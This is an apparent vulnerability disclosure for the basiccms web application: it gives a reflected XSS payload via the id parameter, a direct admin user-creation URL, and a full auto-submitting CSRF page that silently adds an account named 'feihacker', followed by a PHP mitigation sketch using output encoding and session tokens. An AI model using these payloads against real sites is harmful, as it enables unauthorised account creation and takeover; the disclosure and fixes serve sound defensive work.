basiccms (exact version unknown)

菲哥哥

A cross-site scripting (XSS) issue exists:

http://localhost/basiccms/index.php?id=<iframe width='100' height='100' src='http://localhost/basiccms/CSRF.html'>

http://localhost/basiccms/Admin/Users/AddModifyDelete.php?txtUserID=a&txtUserName=b&txtPassword=c&txtEmail=dqq.com&chkActive=&txtID=0&txtActive=Y&txtView=Active

CSRF

http://localhost/basiccms/index.php?id=<iframe width='0' height='0' src='http://localhost/basiccms/CSRF.html'>

CSRF code


<html>
<head><title>basiccms 菲哥哥</title></head>
<!-- On load, the hidden form below is submitted automatically with the visitor's admin session -->
<body onload="javascript:document.form.submit()">
<form action="http://localhost/basiccms/Admin/Users/AddModifyDelete.php" method="post" name="form">
<input type="hidden" name="txtUserID" value="feihacker">
<input type="hidden" name="txtUserName" value="feihacker">
<input type="hidden" name="txtPassword" value="feihacker">
<input type="hidden" name="txtEmail" value="xxxx@qq.com">
<input type="hidden" name="chkActive">
<input type="hidden" name="txtID" value="0">
<input type="hidden" name="txtActive" value="Y">
<input type="hidden" name="txtView" value="Active">
</form>
</body>
</html>
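
A mitigation sketch for the two issues above, as an added example that is not basiccms's own code: it encodes the id value before output and requires a per-session token on the POST to AddModifyDelete.php. The function names render_id, csrf_token and csrf_ok and the csrf_token form field are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example, not basiccms source; all function and field names are hypothetical.

// index.php: emit the id parameter as text so markup in it is never parsed.
function render_id(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Admin forms: one random token per session, placed in a hidden csrf_token field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// AddModifyDelete.php: run this check before any change to the user table.
function csrf_ok(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false; // state changes are not accepted over GET
    }
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($given) && $expected !== ''
        && hash_equals($expected, $given); // constant-time comparison
}

// Constructed demo data: the first request mirrors the auto-submitted form, which has no token.
$session = [];
$token = csrf_token($session);
$forged = ['txtUserID' => 'a', 'txtUserName' => 'b', 'txtID' => '0'];
$genuine = $forged + ['csrf_token' => $token];

var_dump(csrf_ok('POST', $forged, $session));
var_dump(csrf_ok('POST', $genuine, $session));
var_dump(csrf_ok('GET', $genuine, $session));
echo render_id("<iframe width='0' height='0' src='http://localhost/basiccms/CSRF.html'>"), PHP_EOL;
```

Both fixes are needed together: script injected through the id parameter runs in the site's own origin and can read a token from an admin page, so the token check does not hold while the XSS remains.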